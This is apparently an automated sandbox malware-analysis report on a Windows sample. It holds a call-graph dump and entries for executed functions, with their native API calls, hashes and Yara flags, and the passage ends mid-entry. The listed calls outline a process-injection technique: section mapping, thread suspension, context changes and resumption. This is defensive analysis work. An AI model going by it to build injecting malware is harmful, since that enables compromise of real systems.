96698->96700 96701 427a51 96699->96701 96700->96627 96704 40b393 96701->96704 96703 427a62 96703->96627 96706 40b3b8 96704->96706 96705 40b4d5 NtDelayExecution 96707 40b4f1 96705->96707 96706->96705 96707->96703 96711 40a4a8 96708->96711 96709 40a5c5 NtResumeThread 96710 40a5e0 96709->96710 96710->96636 96711->96709 96712 428143 96713 428161 96712->96713 96714 4281ba 96712->96714 96716 4293b3 LdrLoadDll 96713->96716 96715 4293b3 LdrLoadDll 96714->96715 96717 4281d0 96715->96717 96718 42817e 96716->96718 96721 40acf3 96718->96721 96720 4281b3 96724 40ad18 96721->96724 96722 40ae35 NtCreateFile 96723 40ae74 96722->96723 96723->96720 96724->96722 96725 423903 96726 42391f 96725->96726 96737 4280a3 96726->96737 96729 423947 96731 4283b3 2 API calls 96729->96731 96730 42395b 96732 4283b3 2 API calls 96730->96732 96733 423950 96731->96733 96734 423964 96732->96734 96741 42a2e3 LdrLoadDll RtlAllocateHeap 96734->96741 96736 42396f 96738 4280c0 96737->96738 96739 4293b3 LdrLoadDll 96738->96739 96740 423940 96739->96740 96740->96729 96740->96730 96741->96736 96742 42b2a3 96743 42b2b3 96742->96743 96744 42b2b9 96742->96744 96747 42a2a3 96744->96747 96746 42b2df 96750 428663 96747->96750 96749 42a2be 96749->96746 96751 428680 96750->96751 96752 4293b3 LdrLoadDll 96751->96752 96753 428691 RtlAllocateHeap 96752->96753 96753->96749 96834 428273 96835 428294 96834->96835 96836 4282e5 96834->96836 96838 4293b3 LdrLoadDll 96835->96838 96837 4293b3 LdrLoadDll 96836->96837 96839 4282fb 96837->96839 96840 4282b1 96838->96840 96843 40af23 96840->96843 96842 4282de 96846 40af48 96843->96846 96844 40b065 NtReadFile 96845 40b09c 96844->96845 96845->96842 96846->96844 96847 423c93 96851 423ca2 96847->96851 96848 423d2f 96849 423ce9 96850 42a1c3 2 API calls 96849->96850 96852 423cf9 96850->96852 96851->96848 96851->96849 96853 423d2a 96851->96853 96854 42a1c3 2 API calls 96853->96854 96854->96848 96754 413bc3 96755 413bdd 96754->96755 96762 4173a3 96755->96762 96757 413bfb 96758 423da3 LdrLoadDll 96757->96758 96759 413c11 96758->96759 96760 413c40 96759->96760 96761 413c2f PostThreadMessageW 96759->96761 96761->96760 96763 4173c7 96762->96763 96764 417403 LdrLoadDll 96763->96764 96765 4173ce 96763->96765 96764->96765 96765->96757 96766 419c83 96767 419c9b 96766->96767 96771 419cf5 96766->96771 96767->96771 96772 41d323 LdrLoadDll 96767->96772 96769 419cdf 96769->96771 96773 41d5b3 96769->96773 96772->96769 96774 41d5d9 96773->96774 96775 423da3 LdrLoadDll 96774->96775 96777 41d62d 96775->96777 96776 41d99d 96776->96771 96777->96776 96820 428743 LdrLoadDll 96777->96820 96779 41d67e 96780 41d985 96779->96780 96821 42b3d3 96779->96821 96781 42a1c3 2 API calls 96780->96781 96781->96776 96783 41d69a 96783->96780 96784 41d7a0 96783->96784 96785 427ae3 2 API calls 96783->96785 96827 4186c3 LdrLoadDll LdrInitializeThunk 96784->96827 96786 41d721 96785->96786 96786->96784 96788 41d729 96786->96788 96788->96776 96790 41d786 96788->96790 96791 41d755 96788->96791 96828 4185c3 NtMapViewOfSection LdrLoadDll 96788->96828 96789 41d7cb 96789->96780 96792 41d7fd 96789->96792 96830 4185c3 NtMapViewOfSection LdrLoadDll 96789->96830 96793 42a1c3 2 API calls 96790->96793 96796 4283b3 2 API calls 96791->96796 96800 41d964 96792->96800 96801 41d82d 96792->96801 96797 41d796 96793->96797 96798 41d765 96796->96798 96797->96771 96829 4258d3 NtDelayExecution LdrLoadDll 96798->96829 96803 42a1c3 2 API calls 96800->96803 96831 428443 LdrLoadDll 96801->96831 96804 41d97b 96803->96804 96804->96771 96805 41d84c 96806 41a403 3 API calls 96805->96806 96807 41d8b5 96806->96807 96807->96780 96808 41d8c0 96807->96808 96809 42a1c3 2 API calls 96808->96809 96810 41d8e4 96809->96810 96832 427d43 LdrLoadDll 96810->96832 96812 41d8f8 96813 427c83 2 API calls 96812->96813 96814 41d91f 96813->96814 96815 41d926 96814->96815 96833 427d43 LdrLoadDll 96814->96833 96815->96771 96817 41d94c 96818 4278f3 2 API calls 96817->96818 96819 41d95a 96818->96819 96819->96771 96820->96779 96822 42b343 96821->96822 96823 42a2a3 2 API calls 96822->96823 96824 42b3a0 96822->96824 96825 42b37d 96823->96825 96824->96783 96826 42a1c3 2 API calls 96825->96826 96826->96824 96827->96789 96828->96791 96829->96790 96830->96792 96831->96805 96832->96812 96833->96817 96855 41a553 96863 4276e3 96855->96863 96857 41a597 96862 41a5b8 96857->96862 96870 427873 96857->96870 96859 41a5a8 96860 41a5c4 96859->96860 96861 4283b3 2 API calls 96859->96861 96861->96862 96864 42773e 96863->96864 96865 427701 96863->96865 96867 4293b3 LdrLoadDll 96864->96867 96866 4293b3 LdrLoadDll 96865->96866 96869 42771e 96866->96869 96868 427754 96867->96868 96868->96857 96869->96857 96871 427891 96870->96871 96872 4278c6 96870->96872 96873 4293b3 LdrLoadDll 96871->96873 96874 4293b3 LdrLoadDll 96872->96874 96875 4278ae 96873->96875 96876 4278dc 96874->96876 96879 409e53 96875->96879 96876->96859 96878 4278bf 96878->96859 96881 409e78 96879->96881 96880 409f95 NtSuspendThread 96882 409fb0 96880->96882 96881->96880 96882->96878 96883 b92b60 LdrInitializeThunk 96884 418598 96885 4283b3 2 API calls 96884->96885 96886 4185a2 96885->96886

                                                                                                                        Executed Functions

                                                                                                                        Function 0040AAC3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186nativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,to@,?,?,?,00000000), ref: 0040AC2D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SectionView
                                                                                                                        • String ID: to@$to@
                                                                                                                        • API String ID: 1323581903-3423273117
                                                                                                                        • Opcode ID: 676d8c6312eacfc3e320d3e475f7c7686042c1811537bcf82107781b5a2d1997
                                                                                                                        • Instruction ID: 88c6af07cecda7dc52f2954e71423d245eb0154dddc4a1c440b087aa91dd83bd
                                                                                                                        • Opcode Fuzzy Hash: 676d8c6312eacfc3e320d3e475f7c7686042c1811537bcf82107781b5a2d1997
                                                                                                                        • Instruction Fuzzy Hash: 2F714CB1E04258DFCB04CFA9C490AEDBBF2AF8D304F18816AE459B7341D638A951CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A8A3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180nativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 108 40a8a3-40a8c2 109 40a8c8-40a907 call 409903 108->109 110 40a8c3 call 4098f3 108->110 113 40a9e5-40aa0e NtCreateSection 109->113 114 40a90d-40a952 call 409993 call 42b7c2 call 409863 call 42b7c2 109->114 110->109 116 40aa14-40aa1b 113->116 117 40aaab-40aab7 113->117 136 40a95d-40a963 114->136 119 40aa26-40aa2c 116->119 121 40aa54-40aa58 119->121 122 40aa2e-40aa52 119->122 125 40aa9a-40aaa8 call 409993 121->125 126 40aa5a-40aa61 121->126 122->119 125->117 127 40aa6c-40aa72 126->127 127->125 130 40aa74-40aa98 127->130 130->127 137 40a965-40a989 136->137 138 40a98b-40a98f 136->138 137->136 138->113 140 40a991-40a9ac 138->140 141 40a9b7-40a9bd 140->141 141->113 142 40a9bf-40a9e3 141->142 142->141
                                                                                                                        APIs
                                                                                                                        • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,1o@,00000000,?,?,08000000), ref: 0040AA01
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateSection
                                                                                                                        • String ID: 1o@
                                                                                                                        • API String ID: 2449625523-1313955917
                                                                                                                        • Opcode ID: c295ff44140c6a2b0e6634bd6207f40f99ab8758f9ee6ce411b7e9a0f5b707be
                                                                                                                        • Instruction ID: 28a81098a72d725d87d8893a00b6b3592a645c596d15c3f0b08f8818d347be54
                                                                                                                        • Opcode Fuzzy Hash: c295ff44140c6a2b0e6634bd6207f40f99ab8758f9ee6ce411b7e9a0f5b707be
                                                                                                                        • Instruction Fuzzy Hash: 60714CB1E04258DFCB04CFA9C591AEDBBF1AF89304F18806AE459B7381D638A952CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040ACF3 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 546 40acf3-40ad12 547 40ad18-40ad57 call 409903 546->547 548 40ad13 call 4098f3 546->548 551 40ae35-40ae6e NtCreateFile 547->551 552 40ad5d-40ada2 call 409993 call 42b7c2 call 409863 call 42b7c2 547->552 548->547 554 40ae74-40ae7b 551->554 555 40af0b-40af17 551->555 574 40adad-40adb3 552->574 557 40ae86-40ae8c 554->557 559 40aeb4-40aeb8 557->559 560 40ae8e-40aeb2 557->560 561 40aefa-40af08 call 409993 559->561 562 40aeba-40aec1 559->562 560->557 561->555 565 40aecc-40aed2 562->565 565->561 568 40aed4-40aef8 565->568 568->565 575 40adb5-40add9 574->575 576 40addb-40addf 574->576 575->574 576->551 578 40ade1-40adfc 576->578 579 40ae07-40ae0d 578->579 579->551 580 40ae0f-40ae33 579->580 580->579
                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AE61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 731e3f6e8ba2e523611b6b9351a583bbb6b3e0c411d973996869ef3de7769258
                                                                                                                        • Instruction ID: c6ec39a31f4d8b50fe65f8e64631f8413f779835fbb3720df3a48058bcedeb27
                                                                                                                        • Opcode Fuzzy Hash: 731e3f6e8ba2e523611b6b9351a583bbb6b3e0c411d973996869ef3de7769258
                                                                                                                        • Instruction Fuzzy Hash: 1C815FB1E04258DFCB04CFA9C490AEDBBF5AF8D304F18816AE459B7341D638A952CF95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040AF23 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 582 40af23-40af87 call 4098f3 call 409903 588 40b065-40b096 NtReadFile 582->588 589 40af8a-40afd2 call 409993 call 42b7c2 call 409863 call 42b7c2 582->589 590 40b133-40b13f 588->590 591 40b09c-40b0a3 588->591 613 40afdd-40afe3 589->613 592 40b0ae-40b0b4 591->592 594 40b0b6-40b0da 592->594 595 40b0dc-40b0e0 592->595 594->592 598 40b122-40b130 call 409993 595->598 599 40b0e2-40b0e9 595->599 598->590 601 40b0f4-40b0fa 599->601 601->598 603 40b0fc-40b120 601->603 603->601 614 40afe5-40b009 613->614 615 40b00b-40b00f 613->615 614->613 615->588 617 40b011-40b02c 615->617 618 40b037-40b03d 617->618 618->588 619 40b03f-40b063 618->619 619->618
                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B089
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 6ddc72b4f6202b06c465cb983a14ae959c414f6f1ea6b32d7fb0a6438048add9
                                                                                                                        • Instruction ID: d6619ef8149ede43c601ef0414cd975a016ba1077e4db4a125d4735272169ad1
                                                                                                                        • Opcode Fuzzy Hash: 6ddc72b4f6202b06c465cb983a14ae959c414f6f1ea6b32d7fb0a6438048add9
                                                                                                                        • Instruction Fuzzy Hash: 947130B1E04158DFCB04CFA9D890AEEBBF5AF4D304F18816AE459B7341D735A941CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040B7B3 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 621 40b7b3-40b817 call 4098f3 call 409903 626 40b8f5-40b91a NtAllocateVirtualMemory 621->626 627 40b81d-40b862 call 409993 call 42b7c2 call 409863 call 42b7c2 621->627 629 40b920-40b927 626->629 630 40b9b7-40b9c3 626->630 649 40b86d-40b873 627->649 632 40b932-40b938 629->632 634 40b960-40b964 632->634 635 40b93a-40b95e 632->635 637 40b9a6-40b9b4 call 409993 634->637 638 40b966-40b96d 634->638 635->632 637->630 640 40b978-40b97e 638->640 640->637 643 40b980-40b9a4 640->643 643->640 650 40b875-40b899 649->650 651 40b89b-40b89f 649->651 650->649 651->626 653 40b8a1-40b8bc 651->653 654 40b8c7-40b8cd 653->654 654->626 655 40b8cf-40b8f3 654->655 655->654
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B90D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 4a9d6b48f57e06537870ffc1ea9537e0d0a9dcc2f8f95f052032ee23512d9848
                                                                                                                        • Instruction ID: c2bc70c67c96ebf08775754c961f24cd964934424d3d7cdecbfbf4049ab5f95d
                                                                                                                        • Opcode Fuzzy Hash: 4a9d6b48f57e06537870ffc1ea9537e0d0a9dcc2f8f95f052032ee23512d9848
                                                                                                                        • Instruction Fuzzy Hash: 5B713CB1E04158DFCB04CFA9D490AEDBBF5AF89304F18806AE459B7351D738A942CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A063 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtGetContextThread.NTDLL(?,?), ref: 0040A1AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 7d74f337bfdbeb07ddfae0daa25d4316be1a32a843e8d25cbcf3dc9f1dcac047
                                                                                                                        • Instruction ID: 569fe0476a0aaca3de4d5581861cfc3fd9c06305b11eb610b2df8ad8e3e41c8d
                                                                                                                        • Opcode Fuzzy Hash: 7d74f337bfdbeb07ddfae0daa25d4316be1a32a843e8d25cbcf3dc9f1dcac047
                                                                                                                        • Instruction Fuzzy Hash: E97162B1E04258DFCB04CFA9C490AEDBBF1BF89314F1881AAE455BB381D638A951CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A273 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtSetContextThread.NTDLL(?,?), ref: 0040A3BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1591575202-0
                                                                                                                        • Opcode ID: 1e982c93f9d650f9dbd291c9a03aa16e87ae41fa8a46d131f8671f23f8a9189f
                                                                                                                        • Instruction ID: b6393094b48186db1cd28faa6a2d1e77d08023efe8f8686be57df15e0784c314
                                                                                                                        • Opcode Fuzzy Hash: 1e982c93f9d650f9dbd291c9a03aa16e87ae41fa8a46d131f8671f23f8a9189f
                                                                                                                        • Instruction Fuzzy Hash: 617160B1E04258DFCB04CFA9D490AEDBBF1BF89304F18806AE855B7341D638A951DF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040B393 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtDelayExecution.NTDLL(000000CA,?,?,?,00000000), ref: 0040B4DE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DelayExecution
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1249177460-0
                                                                                                                        • Opcode ID: 939a7ef11426b680e6e28c661b4955a8a2544a13258ce9ecde5f03bee7dc1711
                                                                                                                        • Instruction ID: 2a0f2d4374a5b1372567ab7d7accfbe094e16785fb5b7fbcc333c631794ade9e
                                                                                                                        • Opcode Fuzzy Hash: 939a7ef11426b680e6e28c661b4955a8a2544a13258ce9ecde5f03bee7dc1711
                                                                                                                        • Instruction Fuzzy Hash: EB714E71E04158DFCB05CFA9D490AEDBBF1AF49314F1880AAE455B7381D738AA41DF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040A483 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtResumeThread.NTDLL(000000CA,?,?,?,?), ref: 0040A5CD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: 938f3f3cd1754befc6a863fc556910306b31119e5965b990b3011990cda5dcd5
                                                                                                                        • Instruction ID: 4b97a682b6224d7f281c8b5783285ffed00d0dd34314d56ea9491087e06bde8e
                                                                                                                        • Opcode Fuzzy Hash: 938f3f3cd1754befc6a863fc556910306b31119e5965b990b3011990cda5dcd5
                                                                                                                        • Instruction Fuzzy Hash: C4716FB1E04258DFCB04CFA9D890AEDBBF1BF89304F18806AE455B7381D638A952CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00409E53 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 657 409e53-409e72 658 409e78-409eb7 call 409903 657->658 659 409e73 call 4098f3 657->659 662 409f95-409faa NtSuspendThread 658->662 663 409ebd-409f02 call 409993 call 42b7c2 call 409863 call 42b7c2 658->663 659->658 665 409fb0-409fb7 662->665 666 40a047-40a053 662->666 685 409f0d-409f13 663->685 667 409fc2-409fc8 665->667 669 409ff0-409ff4 667->669 670 409fca-409fee 667->670 672 40a036-40a044 call 409993 669->672 673 409ff6-409ffd 669->673 670->667 672->666 677 40a008-40a00e 673->677 677->672 680 40a010-40a034 677->680 680->677 686 409f15-409f39 685->686 687 409f3b-409f3f 685->687 686->685 687->662 689 409f41-409f5c 687->689 690 409f67-409f6d 689->690 690->662 691 409f6f-409f93 690->691 691->690
                                                                                                                        APIs
                                                                                                                        • NtSuspendThread.NTDLL(?,?), ref: 00409F9D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SuspendThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3178671153-0
                                                                                                                        • Opcode ID: d69f2f010816b678afba4fc40191f73e037bb108183dfcae5047b080e2ee51d2
                                                                                                                        • Instruction ID: e2c7ee916660eead3b8b3a6cfbdb59a4db716f9a626befd2b0991b3cb207a41a
                                                                                                                        • Opcode Fuzzy Hash: d69f2f010816b678afba4fc40191f73e037bb108183dfcae5047b080e2ee51d2
                                                                                                                        • Instruction Fuzzy Hash: B9714EB1E04158DFCB05CFA9C590AEDBBF1AF89304F18806AE459B7382D639AD42DF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004173A3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417415
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: d07f43acae5381c7935257da1f181071a1ba76ca27e944f1e8fe1308dfd9cdbf
                                                                                                                        • Instruction ID: dc88cab253082be26519daed94df5a19f06b394c94b2d24a4c846edb1bb7cedb
                                                                                                                        • Opcode Fuzzy Hash: d07f43acae5381c7935257da1f181071a1ba76ca27e944f1e8fe1308dfd9cdbf
                                                                                                                        • Instruction Fuzzy Hash: 340152B1E0010DA7DB10DAE5DC42FDEB3789B54304F008196ED1897240F634EB54CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004283B3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(0041A5B8,?,?,00000000,?,0041A5B8,?,?,?,?,?,?,?,?,00000000,?), ref: 004283E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction ID: fb4f0cbf1e0c10db5c24081458ac51f9d778ab51e9cf6bed3cc3aba60fb7db93
                                                                                                                        • Opcode Fuzzy Hash: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction Fuzzy Hash: 03E086722406147BD120EA5ADC01FDB775CDFC5714F004019FA0867241C6717A1187F4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: fae82645d80dd389af32d68aea962721e56c69d26c851103d9a728ad5de42f42
                                                                                                                        • Instruction ID: b090dfa03b204b7ade969b763fdca9b8be5e13327ee56de1472b5c902686063c
                                                                                                                        • Opcode Fuzzy Hash: fae82645d80dd389af32d68aea962721e56c69d26c851103d9a728ad5de42f42
                                                                                                                        • Instruction Fuzzy Hash: 069002A270640003420571988414616404A87E1301B55C072E10145D1DC92589916125
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 2de8889ee4319bf4ee711880f3f86c01316332c90f52f89db519d3eb0b2acb4f
                                                                                                                        • Instruction ID: 404972eed2e57366184d8a10a05f5c57c49ff8faa55985b794f34148959114e3
                                                                                                                        • Opcode Fuzzy Hash: 2de8889ee4319bf4ee711880f3f86c01316332c90f52f89db519d3eb0b2acb4f
                                                                                                                        • Instruction Fuzzy Hash: BC90027270548802D2107198C40474A004587D1301F59C462A4424699D8A9589917121
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 01f06cc7bbba99aeeedd7230576da5d07606c155d2b9b28631e1ecf88f0fbba4
                                                                                                                        • Instruction ID: 4ced247747019c4dbcce85eb766c39054c6d6cfce602f0827d118f4abf0d91a2
                                                                                                                        • Opcode Fuzzy Hash: 01f06cc7bbba99aeeedd7230576da5d07606c155d2b9b28631e1ecf88f0fbba4
                                                                                                                        • Instruction Fuzzy Hash: 9B90027270540413D21171988504707004987D1341F95C463A0424599D9A568A52A121
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
